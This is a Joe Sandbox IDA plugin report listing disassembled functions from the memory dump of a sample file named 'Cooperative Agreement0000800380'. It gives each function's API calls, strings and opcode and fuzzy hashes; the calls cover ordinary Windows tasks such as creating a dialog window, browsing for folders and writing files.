Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A

Function 0040E950 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 698COMMONLIBRARYCODE

Download Yara Rule

Strings

D@A, xrefs: 0040F0CB

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID: D@A
API String ID: 0-2037432845
Opcode ID: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
Instruction ID: 1e0778d192f5f23141dad884ed32409d8a0e2e34130d822a75cbeb00c40a84ce
Opcode Fuzzy Hash: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
Instruction Fuzzy Hash: BC428FB06047429FD714CF1AC58472ABBE1FF84304F148A3EE8589BB81D379E966CB95

Function 0040559A Relevance: 3.1, APIs: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004055BA

Part of subcall function 00405553: memset.MSVCRT ref: 00405562
Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

GetVersionExW.KERNEL32(?), ref: 00405619

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
Instruction ID: 9deb98d9ce9b1960b4761c85c685c0f6434d6ff4303ea967f2226934144b7de4
Opcode Fuzzy Hash: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
Instruction Fuzzy Hash: 72311F36E04E6583D6308A188C507A32294E7417A0FDA0F37EDDDB72D0D67F8D45AE8A

Function 00409930 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004098F0,0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008), ref: 00409A6C
SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008,00000008), ref: 00409A80

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
Instruction ID: 9241775fbeca2ef236d22ba042fa6dd18ecd55e37cf60d082ab63f5987e9b773
Opcode Fuzzy Hash: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
Instruction Fuzzy Hash: CFE0A571208315EFC310CF10D888A867AB4B748741F02C43EA02992262EB348949DF1D

Function 0040B347 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 0040B359

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
Instruction ID: d2e712a387542d9911dc411e7765b1f2c08275ba07bac0dbf1d1b28710e8a60d
Opcode Fuzzy Hash: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
Instruction Fuzzy Hash: 13D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86

Function 0040F3C8 Relevance: 2.1, Strings: 1, Instructions: 842COMMON

Download Yara Rule

Strings

xAA, xrefs: 0040FD28

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID: xAA
API String ID: 0-1293610936
Opcode ID: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
Instruction ID: 3e0955324bacc98d649988aae549d3f33f39a3fcf449ebb2edb4fadec9577cf0
Opcode Fuzzy Hash: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
Instruction Fuzzy Hash: EF62AF71604B129FC718CF29C59066AB7E1FFC8304F144A3EE89597B80D778E919CB95

Function 00411580 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

xAA, xrefs: 00411933

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID: xAA
API String ID: 0-1293610936
Opcode ID: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
Instruction ID: 97b3e1327a1e87a4b46b26d767485ea51a150d14d874054969dc66b926ead844
Opcode Fuzzy Hash: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
Instruction Fuzzy Hash: 5FD1E6716083818FC704DF28C49026ABBE2EFD9304F188A6EE9D587752D379D94ACB55

Function 00409950 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409956

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
Instruction ID: bc48fdad81fd92ebd0be0b19d5c8e3ba934b166e7abd4bc921d629b17d7e6aca
Opcode Fuzzy Hash: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
Instruction Fuzzy Hash: 02B0017800422ADBDB019F10EC88BC83E72B749745F93C078E42981672EB79069EDA0C

Function 0040C898 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction ID: f4dcce38d5e2b5fea8365ab6f66f10a9b642d7e6e28dacc25e9c3ad87e991d79
Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction Fuzzy Hash: 3512C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685

Function 00410600 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
Instruction ID: fcc74630d9e7e7a990481c7c1f867b264d0775cdb04650b32c3420698d071277
Opcode Fuzzy Hash: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
Instruction Fuzzy Hash: DE81E571620E52CBE718CF1DECD06B633A3E7C9320B49C638DA418779AC539E562D794

Function 004105E0 Relevance: .2, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
Instruction ID: 9051c99f30e4fd58257ce4a82e5c6de57c2f1ea08b849514de36b4a9f860707a
Opcode Fuzzy Hash: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
Instruction Fuzzy Hash: B571C3716205424BD724CF29FCD0A7633A2FBD9311B4BC73DDA4287296C238E962D694

Function 00410910 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction ID: e7601879cae5e26ed9c4f46374459fbcb7982be31dee43e66e8e889727de3951
Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction Fuzzy Hash: 384105736147054BF728CA28C8607EB7390AFD4304F49493FD89A87382C6F9E8C68689

Function 00410993 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction ID: c66b0092c88908efcb1f6d3c64bb4500893f1a226118266ab98ff54ab3bb9a2b
Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction Fuzzy Hash: B631D7726547054BE728C928C8A57EB7390BF94344F49493FC88A87382C6F9E9C6C289

Function 004109D9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction ID: 9975ed08cb8d88c562da0411d9d676463dde2a9787c448613e09b1fe69d496df
Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction Fuzzy Hash: 0421C573754B054BE728896CC8953EB7390BFA4344F49493FC996873C1CAEAE9C5C284

Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B

GetStockObject.GDI32(00000011), ref: 00408FB2
LoadIconW.USER32 ref: 00408FE9
LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
RegisterClassExW.USER32 ref: 00409021
IsWindowEnabled.USER32(00000000), ref: 00409048
EnableWindow.USER32(00000000), ref: 00409059
GetSystemMetrics.USER32(00000001), ref: 00409091
GetSystemMetrics.USER32(00000000), ref: 0040909E
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
wcslen.MSVCRT ref: 00409189
wcslen.MSVCRT ref: 00409191
SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
SetForegroundWindow.USER32(00000000), ref: 0040921F
BringWindowToTop.USER32(00000000), ref: 00409226
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
TranslateMessage.USER32(?), ref: 00409259
DispatchMessageW.USER32(?), ref: 00409264
DestroyAcceleratorTable.USER32(00000000), ref: 00409278
wcslen.MSVCRT ref: 00409289
wcscpy.MSVCRT ref: 004092A1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4

Strings

BUTTON, xrefs: 004091C6
0, xrefs: 00408FC5
D0A, xrefs: 00409003
EDIT, xrefs: 0040914D
STATIC, xrefs: 004090FB

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D0A$EDIT$STATIC
API String ID: 54849019-2968808370
Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59

Function 00401500 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Strings

6pA, xrefs: 004017CD
fpA, xrefs: 0040158A
$pA, xrefs: 00401645
6pA, xrefs: 00401784
fpA, xrefs: 00401590, 004015C7, 004015D1, 004015E3, 004015CB, 004015D5, 004015DD, 004015E7
&pA, xrefs: 0040154F
2pA, xrefs: 004016F3
fpA, xrefs: 004018F7
2pA, xrefs: 004016C5
.pA, xrefs: 0040167C
fpA, xrefs: 004015ED
6pA, xrefs: 00401861
2pA, xrefs: 0040169B
fpA, xrefs: 00401835

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
API String ID: 1295435411-3159487945
Opcode ID: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
Opcode Fuzzy Hash: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D

Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00409373

Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA

memset.MSVCRT ref: 00409381
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
wcsncpy.MSVCRT ref: 004093DD
wcslen.MSVCRT ref: 004093F1
CoTaskMemFree.OLE32(?), ref: 0040947A
wcslen.MSVCRT ref: 00409481
FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Strings

SHELL32.DLL, xrefs: 00409389
$0A, xrefs: 004093CD
SHBrowseForFolderW, xrefs: 004093AA
P, xrefs: 00409429
SHGetPathFromIDListW, xrefs: 004093B2

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-92458654
Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A

Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 00406405

Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA

_wcsdup.MSVCRT ref: 0040644E
_wcsdup.MSVCRT ref: 00406469
_wcsdup.MSVCRT ref: 0040648C
wcsncpy.MSVCRT ref: 00406578
free.MSVCRT ref: 004065DC
free.MSVCRT ref: 004065EF
free.MSVCRT ref: 00406602
wcsncpy.MSVCRT ref: 0040662E

Strings

$0A, xrefs: 0040632F
$0A, xrefs: 0040631F
$0A, xrefs: 0040633E

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $0A$$0A$$0A
API String ID: 1554701960-360074770
Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A

Function 0040A83A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
wcscpy.MSVCRT ref: 0040A89B
wcscat.MSVCRT ref: 0040A8A6
wcslen.MSVCRT ref: 0040A8AC
